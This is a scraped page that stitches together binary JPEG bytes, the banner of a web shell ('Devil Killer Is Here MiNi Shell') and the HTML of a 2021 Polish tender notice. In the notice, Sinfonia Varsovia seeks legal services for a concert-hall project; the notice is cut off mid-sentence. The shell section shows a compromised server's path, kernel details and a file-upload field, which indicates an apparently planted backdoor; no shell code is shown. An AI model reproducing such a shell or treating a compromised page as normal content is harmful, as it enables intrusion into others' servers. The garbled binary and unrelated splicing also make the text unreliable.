JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210629/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210629/0009839903-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00098399 z dnia 2021-06-29</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Obsługa prawna zadania inwestycyjnego pn. Modernizacja zabytkowych obiektów oraz budowa sali koncertowej przy ul. Grochowskiej na potrzeby Sinfonii Varsovii (Część A) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SINFONIA VARSOVIA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 141246217</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Grochowska 272</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-849</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(22) 582 70 82 lub (22) 582 70 72.</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@sinfoniavarsovia.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sinfoniavarsovia.org</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samorządowa Instytucja Kultury </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Obsługa prawna zadania inwestycyjnego pn. Modernizacja zabytkowych obiektów oraz budowa sali koncertowej przy ul. Grochowskiej na potrzeby Sinfonii Varsovii (Część A) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-50e94185-d8bb-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00098399</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.sinfoniavarsovia.org/postepowania-pzp <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami w zakresie:<br/>1)	składania ofert (a także zmiany lub wycofania oferty) odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/ oraz strony ePUAP https://epuap.gov.pl/wps/portal; niedopuszczalne jest złożenie lub zmiana oferty poprzez przesłanie jej na adres e-mail - oferta przesłana w taki sposób zostanie odrzucona zgodnie z art. 226 ust. 1 pkt 6 PZP;<br/>2)	który nie dotyczy składania ofert - odbywa się elektronicznie za pośrednictwem poczty elektronicznej pod adresem email wskazanym do korespondencji w rozdziale I SWZ;<br/><br/>adres strony internetowej postępowania:<br/><br/>www.bip.sinfoniavarsovia.org/postepowania-pzp</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w przepisach PZP, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej należy rozumieć środki komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną. <br/>W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami w zakresie:<br/>1)	składania ofert (a także zmiany lub wycofania oferty) odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/ oraz strony ePUAP https://epuap.gov.pl/wps/portal; niedopuszczalne jest złożenie lub zmiana oferty poprzez przesłanie jej na adres e-mail - oferta przesłana w taki sposób zostanie odrzucona zgodnie z art. 226 ust. 1 pkt 6 PZP;<br/>2)	który nie dotyczy składania ofert - odbywa się elektronicznie za pośrednictwem poczty elektronicznej pod adresem email wskazanym do korespondencji w rozdziale I SWZ;<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na ePUAP.<br/>Szczegółowe informacje nt. zasad korzystania z miniPortalu znajdują się na stronie internetowej: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Na podstawie art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (zwanej dalej „RODO”) zamawiający jako administrator danych osobowych przedstawia wymagane informacje związane z przetwarzaniem danych osobowych.<br/>2.	Administratorem danych osobowych jest Sinfonia Varsovia z siedzibą pod adresem: 03-849 Warszawa, ul. Grochowska 272, wpisana do Rejestru Instytucji Kultury m. st. Warszawy pod nr RIA/2/08 (zwana dalej „administratorem”).<br/>3.	Administrator wyznaczył inspektora ochrony danych, z którym można skontaktować się pisemnie na adres administratora lub poprzez e-mail: sekretariat@sinfoniavarsovia.org. Z inspektorem ochrony danych można kontaktować się we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem.<br/>4.	Dane osobowe będą przetwarzane w celu udzielenia zamówienia publicznego na podstawie art. 6 ust. 1 pkt c) RODO, tj. ze względu na to, że przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze polegającego na obowiązku stosowania przepisów ustawy z dnia 11-09-2019 r. - Prawo zamówień publicznych.<br/>5.	Podanie danych osobowych jest wymogiem ustawowym; konsekwencją niepodania danych będzie brak możliwości udziału w postępowaniu o udzielenie zamówienia publicznego.<br/>6.	Odbiorcami danych osobowych będą uczestnicy postępowania o udzielenie zamówienia publicznego, osoby, którym zostanie udostępniona dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego na podstawie art. 18 i art. 74 PZP, operator miniPortalu prowadzonego przez Urząd Zamówień Publicznych, a także podmioty świadczące na rzecz administratora usługi informatyczne, usługi pocztowe oraz usługi prawne.<br/>7.	Dane osobowe nie będą przekazywane do państwa trzeciego, tj. poza obszar Europejskiego Obszaru Gospodarczego, ani organizacji międzynarodowej.<br/>8.	Dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy w sprawie zamówienia publicznego przekracza 4 lata, okres przechowywania cały okres obowiązywania umowy w sprawie zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9.	Osobie, której dane są przetwarzane, przysługuje:<br/>1)	na podstawie art. 15 RODO prawo dostępu do swoich danych osobowych;<br/>2)	na podstawie art. 16 RODO prawo żądania sprostowania lub uzupełnienia swoich danych osobowych;<br/>3)	na podstawie art. 18 RODO prawo żądania ograniczenia przetwarzania swoich danych osobowych.<br/>10.	Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z przepisami PZP, a także nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>11.	W postępowaniu o udzielenie zamówienia publicznego zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>12.	Osobie, której dane są przetwarzane, nie przysługuje:<br/>1)	prawo do usunięcia danych osobowych;<br/>2)	prawo wniesienia sprzeciwu wobec przetwarzania swoich danych osobowych, ponieważ przetwarzanie danych osobowych nie jest oparte na art. 6 ust. 1 lit. e) lub f) RODO.<br/>13.	W trakcie przetwarzania danych osobowych nie będzie następować zautomatyzowane podejmowanie decyzji oraz nie jest stosowane profilowanie.<br/>14.	Osobie, której dane są przetwarzane, przysługuje prawo wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu Ochrony Danych Osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PP-US-1/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług kompleksowej obsługi prawnej zadania inwestycyjnego pn. „Modernizacja zabytkowych obiektów oraz budowa sali koncertowej przy ul. Grochowskiej na potrzeby Sinfonii Varsovii” (część A).<br/>Przedmiot zamówienia zasadniczego (gwarantowanego) obejmuje wykonanie następujących usług:<br/>1)	obsługi prawnej postępowania o udzielenie zamówienia publicznego na usługi nadzoru inwestorskiego (inżyniera kontraktu) o wartości równej lub przekraczającej progi unijne;<br/>2)	obsługi prawnej postępowania o udzielenie zamówienia publicznego na roboty budowlane dotyczące „Modernizacji zabytkowych obiektów oraz budowy sali koncertowej przy ul. Grochowskiej na potrzeby Sinfonii Varsovii” (część A) o wartości równej lub przekraczającej progi unijne;<br/>3)	obsługi prawnej postępowania o udzielenie zamówienia publicznego na usługi projektowe dotyczące drogi 1.KDDPJ o wartości mniejszej niż progi unijne;<br/>4)	bieżącej obsługi prawnej zadania inwestycyjnego pn. „Modernizacja zabytkowych obiektów oraz budowa sali koncertowej przy ul. Grochowskiej na potrzeby Sinfonii Varsovii” (część A) przez okres 48 miesięcy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79100000-5 - Usługi prawnicze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Przedmiot zamówienia opcjonalnego obejmuje wykonanie następujących usług (jednej lub obydwu - według wyboru zamawiającego):<br/>1)	w ramach opcji nr 1 - obsługi prawnej postępowania o udzielenie zamówienia publicznego na dostawę wyposażenia scenicznego do obiektów Sinfonii Varsovii o wartości równej lub przekraczającej progi unijne; <br/>2)	w ramach opcji nr 2 - obsługi prawnej postępowania o udzielenie zamówienia publicznego na dostawę mebli i wyposażenia biurowego przeznaczonych do pomieszczeń w obiektach Sinfonii Varsovii o wartości o wartości równej lub przekraczającej progi unijne.<br/>Zamawiający przewiduje możliwość skorzystania z opcji nr 1 polegającej na zleceniu wykonawcy wykonania zamówienia obejmującego obsługę prawną postępowania o udzielenie zamówienia publicznego na dostawę wyposażenia scenicznego do obiektów Sinfonii Varsovii, gdy zajdzie potrzeba obsługi prawnej przez wykonawcę tego postępowania. Maksymalna wartość opcji nr 1 równa będzie wysokości wynagrodzenia za wykonanie usług obsługi prawnej tego postępowania wskazanej przez wykonawcę w ofercie złożonej w niniejszym postępowaniu. Skorzystanie z opcji nr 1 i wykonanie objętego nią zamówienia nastąpi zgodnie z warunkami określonymi w „Opisie przedmiotu zamówienia” stanowiącym załącznik nr 1 do SWZ oraz zgodnie z „Projektowanymi postanowieniami umowy w sprawie zamówienia publicznego” stanowiącymi załącznik nr 2 do SWZ.<br/>Zamawiający przewiduje możliwość skorzystania z opcji nr 2 polegającej na zleceniu wykonawcy wykonania zamówienia obejmującego obsługę prawną postępowania o udzielenie zamówienia publicznego na dostawę mebli i wyposażenia biurowego przeznaczonych do pomieszczeń w obiektach Sinfonii Varsovii, gdy zajdzie potrzeba obsługi prawnej przez wykonawcę tego postępowania. Maksymalna wartość opcji nr 2 równa będzie wysokości wynagrodzenia za wykonanie usług obsługi prawnej tego postępowania wskazanej przez wykonawcę w ofercie złożonej w niniejszym postępowaniu. Skorzystanie z opcji nr 2 i wykonanie objętego nią zamówienia nastąpi zgodnie z warunkami określonymi w „Opisie przedmiotu zamówienia” stanowiącym załącznik nr 1 do SWZ oraz zgodnie z „Projektowanymi postanowieniami umowy w sprawie zamówienia publicznego” stanowiącymi załącznik nr 2 do SWZ. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">48 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówienia z wolnej ręki, o którym mowa w art. 214 ust. 1 pkt 7 PZP, poprzez udzielenie, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, zamówień polegających na powtórzeniu podobnych usług w postaci bieżącej obsługi prawnej lub obsługi prawnej postępowań o udzielenie zamówienia publicznego na roboty budowlane, usługi lub dostawy - na potrzeby zadania inwestycyjnego dotyczącego modernizacji zabytkowych obiektów oraz budowy sali koncertowej przy ul. Grochowskiej na potrzeby Sinfonii Varsovii - na warunkach analogicznych jak w przypadku usług bieżącej obsługi prawnej lub obsługi prawnej postępowań o udzielenie zamówienia publicznego, świadczonych w ramach zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni oferty według następujących kryteriów oceny ofert:<br/>1)	kryterium cena (C) - waga kryterium 50%;<br/>2)	kryterium doświadczenie osób w obsłudze prawnej postępowań o udzielenie zamówienia publicznego (D) - waga kryterium 30%;<br/>3)	kryterium doświadczenie osób w reprezentacji w sporach (R) - waga kryterium 20%.<br/>2.	Punkty w kryterium cena zostaną obliczone zgodnie z następującym wzorem: C = Cmin/Cbad x 100 pkt x 50%, gdzie: C - liczba punktów w kryterium cena, Cmin - najniższa cena brutto spośród wszystkich złożonych ofert niepodlegających odrzuceniu, Cbad - cena brutto wskazana w ofercie badanej.<br/>3.	Podstawą oceny ofert w kryterium cena będzie wskazana przez wykonawcę w ofercie łączna cena brutto za wykonanie całego zamówienia, tj. zamówienia zasadniczego (gwarantowanego) i obydwu zamówień objętych opcją.<br/>4.	Maksymalna liczba punktów, jaką oferta może otrzymać w kryterium cena to 50 punktów.<br/>5.	Podstawą oceny ofert w kryterium doświadczenie osób w obsłudze prawnej postępowań o udzielenie zamówienia publicznego będą wykazane przez wykonawcę usługi kompleksowej obsługi prawnej odrębnych postępowań o udzielenie zamówienia publicznego na roboty budowlane, zgodnie z postanowieniami SWZ. Maksymalna liczba punktów, jaką oferta może otrzymać w tym kryterium, to 30 punktów.<br/>6.	Podstawą oceny ofert w kryterium doświadczenie osób w reprezentacji w sporach będą wykazane przez wykonawcę usługi reprezentacji inwestora - w charakterze pełnomocnika - w odrębnych postępowaniach, zgodnie z postanowieniami SWZ. Maksymalna liczba punktów, jaką oferta może otrzymać w tym kryterium, to 20 punktów.<br/>7.	Zamawiający wskazuje, że jeżeli wykonanie tej samej usługi zostanie przypisane więcej niż jednej osobie skierowanej przez wykonawcę do realizacji zamówienia, punkty w kryterium doświadczenie osób w reprezentacji w sporach zostaną przyznane jak za wykonanie jednej takiej usługi.<br/>8. Za najkorzystniejszą zostanie uznana oferta która otrzyma największą łączną liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium doświadczenie osób w obsłudze prawnej postępowań o udzielenie zamówienia publicznego (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium doświadczenie osób w reprezentacji w sporach (R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)zdolności do występowania w obrocie gospodarczym - w odniesieniu do tego warunku zamawiający nie formułuje wymagań;<br/>2)uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - w odniesieniu do tego warunku zamawiający nie formułuje wymagań;<br/>3)sytuacji ekonomicznej lub finansowej - w odniesieniu do tego warunku zamawiający wymaga, aby wykonawca posiadał ubezpieczenie odpowiedzialności cywilnej z tytułu prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 600.000 zł;<br/>4)zdolności technicznej lub zawodowej - w odniesieniu do tego warunku zamawiający wymaga, aby wykonawca wykazał, że:<br/>a)posiada odpowiednie doświadczenie, tj. że w okresie ostatnich 3 lat (licząc wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie (a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje należycie) co najmniej dwie usługi (realizowane na podstawie odrębnych umów), w tym:<br/>i.co najmniej jedną usługę o wartości nie mniejszej niż 80.000 zł brutto polegającą na kompleksowej obsłudze prawnej postępowania o udzielenia zamówienia publicznego na roboty budowlane dotyczące budowy lub przebudowy budynku lub budynków zaliczanych do co najmniej jednej z następujących kategorii oznaczonych symbolem PKOB: 1211, 1212, 1220, 1230, 1241, 1261, 1262, 1263, 1264, 1265 lub 1273 - o wartości robót budowlanych nie mniejszej niż 60.000.000 zł brutto; obsługa prawna powinna obejmować w szczególności przygotowanie dokumentacji formalnoprawnej niezbędnej do przeprowadzenia postępowania o udzielenia zamówienia publicznego (w tym projektu ogłoszenia o zamówieniu publicznym, postanowień specyfikacji istotnych warunków zamówienia lub specyfikacji warunków zamówienia, projektu umowy w sprawie zamówienia publicznego) oraz doradztwo prawne w tym zakresie,<br/>ii.co najmniej jedną usługę o wartości nie mniejszej niż 80.000 zł brutto polegającą na kompleksowej obsłudze prawnej postępowania o udzielenia zamówienia publicznego na usługi nadzoru inwestorskiego (inżyniera kontraktu) lub na usługi projektowe dotyczące inwestycji budowlanej - o wartości usług nadzoru 